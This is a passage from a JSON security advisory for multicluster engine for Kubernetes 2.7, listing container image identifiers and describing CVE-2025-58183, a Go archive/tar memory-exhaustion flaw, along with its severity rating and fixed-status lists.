"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:a99ef9cd8f37bbf76d5bb6b81865547af9ec456b0204e36995ff86960abcf1f5_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:1b2c836336117c0e04dc30101898117b68edf6489ad9da955453cb6e4491bb33_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:259049072cf889d7b72fdae5b5a17bd2d4d6fd176cb1da4274b70f02c854dea9_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:90a96bb156d096a0c55fcf27b2dc0176e56c9b7388697ed17d9bbb257c39a3aa_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f3aa3d1b579275dcdf403867cc9b140f34cfcdc099d4b87819ef7f4978af2be1_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:21b52ad7c77dd21bc0a9a20a1ae6e2fc5d236b39e16dbfa82158ec80ef2846d4_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:6a83c52ba828f45e84550ba702ba86d5746057194d389b6959ab7486e8615b16_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:b22d17d474876f6079c86518dbc04e692ade54067cd4fc0c5660d8a1ba0937cf_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:b34be4d5652efaee930bd26536547fd1fc04dda4060605dabc276e59f96a0a0c_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:6ab181004adafad8a5cd0155da9e107ab3989ef97007e69decb7238a9b0597da_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:7782c711aff60d9ac0d8297431eabca6945752292b16beecdb52303ad22f1553_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:9a23dfe4c781261e8db8fbb65517d69c3532fba5e897978b8a7765864b84b495_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:c29b2dc7510dcc147cf8460e4e39c0f2595edc4ff81f62c035333c6354776335_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:08592505c61791b614511a2c51d9963aa3277ac9e2af98954b07e47e36ca6765_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:1145c4b8c3606c2550986f1bf352835300f58d81f6c50d63846983a666602655_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:53c5fd16cd44f631ca08f6eb51e346d99950c9b4c6860743262c068074ba3c9f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:aed4dab31c6e0d932781c631022214fdea5b28e6ccdc00abee3e006d13befe8a_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:31acda49be5c46912447113bf6133b4457f1f49270741859cb1493b65474d203_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:66c468c37631e94fcc32442e93a149caf3ad4831d1817314983dde8ba145fd25_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:d24798fdb05f2c2959b03889dff46e58c3b15d531a3750d1cd153ae4fcfda087_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:fce0a7344e9f0d86a8d5e5dbd70a3a8ef6a55567ade0a7345ffda3344d2617d6_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:04cc5c05db5bd9bd83f529523cc003c0ebe72d1ab55b2617bee8375b5f11616e_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4ed9ab5ffc8c4fb0dc4c9faaa13e63c81dd40e2e04784bd7f48e81a0bd734a14_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:92230ad9427b8002fca17de62427089eaa409edcaa39554a96cf16c23b41b1bd_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:e8e78077943e22dfbf24b01d40f866954e39e783711a3ceab6c6f08e8e07fdce_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:5a1f7f5125b9fff4c8b415e93eaad7257af8ffb3b70823917cf0eec075484b8b_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:a47433ffe10df556b6bea4c0cc3c3f3ac508e1a9d6ab81981f7ab84afc34524c_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:ae032d3383977818eab9f396217d9de8053e6a0fe2657a21fec9b4bae58940ed_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:d2e664349d706e81882258dae2d18de73c65d09649e7ac74f5616ecb81f2ffbe_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:2a8862c66d7bba87f0ab708d1644eb7c01840fc8f5b3b7373044aff4e219e000_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:2d091748418b3f6d3cdcc4b4d773c98c8a22cac2717ed5274a6d8c612af51f71_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:3589f0bf450892dbfe4bac6c5255ebec5109e1d5d2e102dfb8e3e5894427a9b5_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:4dfb3a2b2ea2a32c5cfc770c84fba0f158d2c759d3a6559b01efd365e4a19e52_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:2bc2bb010570cb1f65205b4c6f7f470e8b2242d1401f4d0ab8ba08bdabacefeb_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:495dece80910102a98e78394ca35ee5c4703d32f705f43f9813312872dd8b528_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:86ed174f04e82706d3c5a793fc94c5f3ff78ef7a442056e9ffbfdf04543e47e8_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:a80ab7578c04779f5a91eb489efe6dfa821c2f22fad92f34864402604ae6d89a_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "database/sql: Postgres Scan Race Condition"
},
{
"cve": "CVE-2025-58183",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2025-10-29T23:01:50.573951+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:4667db4cc9699f5e41cda6388eb7371ad9c8c73a92a7fc19115ddd48b562e56e_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:c09c8b8f588cac2b8c4b15a79de635971f002419ffc2b4d967f383160897e2dd_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:d00a17c4162336d52d47452f13d2470ddd4f9d6913759472791ee4d8bfc34d46_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:fe8b267cb2ea707fda229bae30ca074079da2909e7313eff06ba9eb2fb529237_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:6ae1271bcaebb79d7dd48fa4bb89f2cf0bf450cce004899feee7d1a53d230a81_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:8ffc2f2cdfd7753c083ca083a42da60b8783d09b6817c6b22c38c91d67c0b4a5_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:9295aea24d0997fd5112e4bc6701f15e5ed2ee54f298d134aef5c9d499ad7ce5_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:fb103ee7a47badea6dfd32f698cc209bb2242dd90b51986cea6f26a03ade9516_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:8173d4f41f25103f387f1b148f9e90eba72abeccd506bfe657f6fd54cbbcf395_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e146412fb2f0d808cf6a0faa5f39e54032cd4b6c594d67795bb81883ebf0b386_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:ec486aa31c687d3f9e8dffe7ae5018b9ce3cc8795a91765c237eb72b2f6984c5_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:fb47b5a6d4fe1c966eb29109c27a5e323b6b4e665a2754f234979cef4bfc6fc2_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:111a02c966b528a619c9ad5942151e64374e0c57d80be21f91c0f41469c63c19_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:1396ea60940f7dfc33d67d918dd82d62f780d0e837e12785ccec2ada30ce3f93_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:4c393e89346494a9abd31c664e977edacd6ca8bf1f1c28c2aa9a6625f0d02d9f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ca4d807da014acefb7e963000cd2431352087dd908491ff4189592f53dec93ff_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:694ac8be10bee34d7c34fdcabde7dfdf1558053cac0479eca4677971c09589e6_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:c0b2cdac26577de087dfd119ff0e2f996f211cd9021bed43d01e286fe166642d_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:d35fb00e5d71a79ec679d7bb9911c4974ca4ebe334e76461270594feda1a7378_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:dabdf0f6fec7ebd5b86034281ae740aea0e77146e33bdd04c01590745b68ea8e_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:6e44a95fd942fad8a4f43379d100d2f11808caef975afbafe244543b2f33e2b1_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:bbcbedae29915aecb2d0722d16a5265b214714b2e8695f4885395982507950f8_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:f02386b7e2476ab45ef771bdc6034ba4148bdbbf30cb95e2110a681adaeaa03e_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:f87238bec802fb8e8aa257f73eb32f3b3cacf1564677e594ca0d165ed2c0a021_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:04ac93d513d3d10d83de367893012f4098b281c89d773d5799393b1ecb184658_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:5b51bbe361be033ce654374dbf65f15a7449072207d8350959becd9921a7da1a_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:89d53a8fca9a27f188f13631f4416eb9c8460868e095ed207f55591c76ea0acf_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:e5ab3e9b45628c867d6b8babec0e2dc9b32d1b9bdf5aae9a74ac0e45b553355f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:1108dd8708d80e09fcc6cf4ecb2ec3d076f1fd22814b6c6ce2b4236143779527_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:4b8c28da26c5fcc04cfe2072965fdb957fd2ebc514afe8ab46c79d625dc7dd46_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:8cbfa37103a4fb66ce05ae0a001412af7556b61b4079406c82bb82a1c7bf841a_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:bf00fb14cf15607b90bfd5719b9707081b9f4696d4296944586fc839e0210d9b_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:2efa3dbf99e5be1f8eb4f169f5f2229b338fdf2d2c72b9c0b0da9392e612cc5f_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:7141546552e4237c8b118044c3cc310ddfee917b547c36857a291c33e185bcc1_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:8aaa0f89e8e6ad810632240a7e032b6e673f69e1e4018ab6b36dd87de69ceeb8_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:d07f47405187ce8f4b91686b48d4ed71336ff2bd9218b88c31f52ddc22db9238_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:47c835ad25efcfa42534a1daf7235b18b318030546e81c784027c62ab665b896_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:50276a56714a1bc1aabedbadb7f702913412f6a20db8b110986436845ee2f3c7_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:705746f64a46c4990cc3ec16236c41c64352493fdeb9f7fbbc34353ff111e267_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:9358b7c24e4c4f8e72266af077352af1af3ba61e266087cf55b7dc9ea0eddcb9_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:466a01f1457e47e5b418c8e1d87cc2d92e100d635e6cbbc6224039b71d413105_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:5d81a9b6f31e72d5beddec8128e693ecacd03bbbb6640a626e06a9b4b033c47e_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:6d05352bd35932dc05bd12a06890b7e99594773791e0c8edd8492a835155acb3_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:70ad5cb3532bde1dd5a9337a7064dd8e1ff1799bcb017a2d2e6536a932ce22dc_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:0c554f87aa16a5c7a6c6ee78886787b055fad40c557f1cbaa5996db9a09b41ce_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:618edff2bf45eea71e6f3e7f7b24e95f10314b146ff45ac72ea8cabb1cb373d4_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:92d36152258c9d926be0bdcfac34995f22eec3518111fbf2c768b660129f5440_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:cacde4ea2c1d98290f68b7ad0a3ca31582710a3b64442649baace5b8ee953f89_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:365a26e2d054aefe147ad411da6014e76c9d4f4646a8382b9be3f3eeb35fc6cf_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:775d0fbe7f2a3d4abdbb751331dbdc7457ff489e1d2aa32c93b7bec4dff2eeb4_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:d0062eaae78adb437020762d1a3e555c2b5bc0fe05da89716b2e8acf673ff661_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:db93b4a928c940e66ea4ada9f69f3b20f6bf4d64146df89d8e9e5a66acd2a03c_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:0b57da9ddb495d659da29e2a699d5fedb720056f72f77e426c40c1a7bae79a87_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:52625c24cfe3921bc6c00090b150b36544410b9b877b43e148abf634cdb8c0e9_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:91c20f61a7e054ac5b53b8b8ad06f110ed3db0ace9258fd9e2b3fa03f59f11ab_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:e91c55697e0d95b8c9265d0072c5b80faed4dd9dfdfeb87443f98f473fcf42bc_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:06109d274a92145cc11d4f30ed877d2a233a4852e3537d87b117e6682b911b20_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:4f7e7a8764b018c6d51c0700a76f0dcedcf5ffe85f28f66c214e36455105e32f_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:d6afe401727d8b252009042c03319fb6a9bc2cfd2ffba5e5518c9a22e91692de_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:dc366eaa2c3f3f72003f928262c03900983aaac8352615715d72bf5223b59a94_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:2a1963aa5fb3ee452084510bac3792ae508b5c9eeb41c676e13f2551d7c88d60_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:9774a696206b422b52b5f1082750d7e62cccf3c7ee0e28ec156b560cf1acebb0_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:99d0b694cee080c924c2e2294af4a0a36f669129516f205b5e13a3eabd1ee019_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:a99ef9cd8f37bbf76d5bb6b81865547af9ec456b0204e36995ff86960abcf1f5_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:21b52ad7c77dd21bc0a9a20a1ae6e2fc5d236b39e16dbfa82158ec80ef2846d4_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:6a83c52ba828f45e84550ba702ba86d5746057194d389b6959ab7486e8615b16_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:b22d17d474876f6079c86518dbc04e692ade54067cd4fc0c5660d8a1ba0937cf_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:b34be4d5652efaee930bd26536547fd1fc04dda4060605dabc276e59f96a0a0c_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:08592505c61791b614511a2c51d9963aa3277ac9e2af98954b07e47e36ca6765_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:1145c4b8c3606c2550986f1bf352835300f58d81f6c50d63846983a666602655_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:53c5fd16cd44f631ca08f6eb51e346d99950c9b4c6860743262c068074ba3c9f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:aed4dab31c6e0d932781c631022214fdea5b28e6ccdc00abee3e006d13befe8a_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:31acda49be5c46912447113bf6133b4457f1f49270741859cb1493b65474d203_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:66c468c37631e94fcc32442e93a149caf3ad4831d1817314983dde8ba145fd25_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:d24798fdb05f2c2959b03889dff46e58c3b15d531a3750d1cd153ae4fcfda087_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:fce0a7344e9f0d86a8d5e5dbd70a3a8ef6a55567ade0a7345ffda3344d2617d6_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:04cc5c05db5bd9bd83f529523cc003c0ebe72d1ab55b2617bee8375b5f11616e_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4ed9ab5ffc8c4fb0dc4c9faaa13e63c81dd40e2e04784bd7f48e81a0bd734a14_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:92230ad9427b8002fca17de62427089eaa409edcaa39554a96cf16c23b41b1bd_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:e8e78077943e22dfbf24b01d40f866954e39e783711a3ceab6c6f08e8e07fdce_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:5a1f7f5125b9fff4c8b415e93eaad7257af8ffb3b70823917cf0eec075484b8b_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:a47433ffe10df556b6bea4c0cc3c3f3ac508e1a9d6ab81981f7ab84afc34524c_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:ae032d3383977818eab9f396217d9de8053e6a0fe2657a21fec9b4bae58940ed_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:d2e664349d706e81882258dae2d18de73c65d09649e7ac74f5616ecb81f2ffbe_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:2a8862c66d7bba87f0ab708d1644eb7c01840fc8f5b3b7373044aff4e219e000_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:2d091748418b3f6d3cdcc4b4d773c98c8a22cac2717ed5274a6d8c612af51f71_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:3589f0bf450892dbfe4bac6c5255ebec5109e1d5d2e102dfb8e3e5894427a9b5_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:4dfb3a2b2ea2a32c5cfc770c84fba0f158d2c759d3a6559b01efd365e4a19e52_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2407258"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the archive/tar package in the Go standard library. tar.Reader does not set a maximum size on the number of sparse region data blocks in GNU tar pax 1.0 sparse files. A specially crafted tar archive with a pax header indicating a big number of sparse regions can cause a Go program to try to allocate a large amount of memory, causing an out-of-memory condition and resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: archive/tar: Unbounded allocation when parsing GNU sparse map",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this issue, an attacker needs to be able to process a specially crafted GNU tar pax 1.0 archive with the application using the archive/tar package. Additionally, this issue can cause the Go application to allocate a large amount of memory, eventually leading to an out-of-memory condition and resulting in a denial of service with no other security impact. Due to these reasons, this flaw has been rated with a moderate severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:76d00b37dc5c5d7bf489f55f3a41a953677449491b01c789bf7b29c789c461b7_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:a2fa219ec0da0910c1a858ac43d53288f2cf434c26fcb6cd8185e9d6f13a1ebd_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:c4e710e3ab66dfbcb3f2db4d17f73aea44ea9d2649e5f5cec94c1b51644809cf_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:c6a8bf6b7644c45a41d4c8a1c31cc08e03b6ac5ed36f562256cb1509f26a47c7_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:2dc8a21ac845a94b55a048554052666910cd7e5fc2f9731d62c8911f18ac3fcb_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:4cb50e9064955ace00ee9bbc0592f5e073affa7a29d0d8a119b67bb8fc9d5a20_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:674b94c6913ca04eb711ccf438f24fe22d7332c8f7ca733a8d0e6b5b5b3f99ab_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:dc747542c832d5868ce34b622f3cb73a3376beab272bdb156b4a5d29439173a8_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:1b2c836336117c0e04dc30101898117b68edf6489ad9da955453cb6e4491bb33_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:259049072cf889d7b72fdae5b5a17bd2d4d6fd176cb1da4274b70f02c854dea9_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:90a96bb156d096a0c55fcf27b2dc0176e56c9b7388697ed17d9bbb257c39a3aa_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f3aa3d1b579275dcdf403867cc9b140f34cfcdc099d4b87819ef7f4978af2be1_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:6ab181004adafad8a5cd0155da9e107ab3989ef97007e69decb7238a9b0597da_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:7782c711aff60d9ac0d8297431eabca6945752292b16beecdb52303ad22f1553_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:9a23dfe4c781261e8db8fbb65517d69c3532fba5e897978b8a7765864b84b495_amd64",
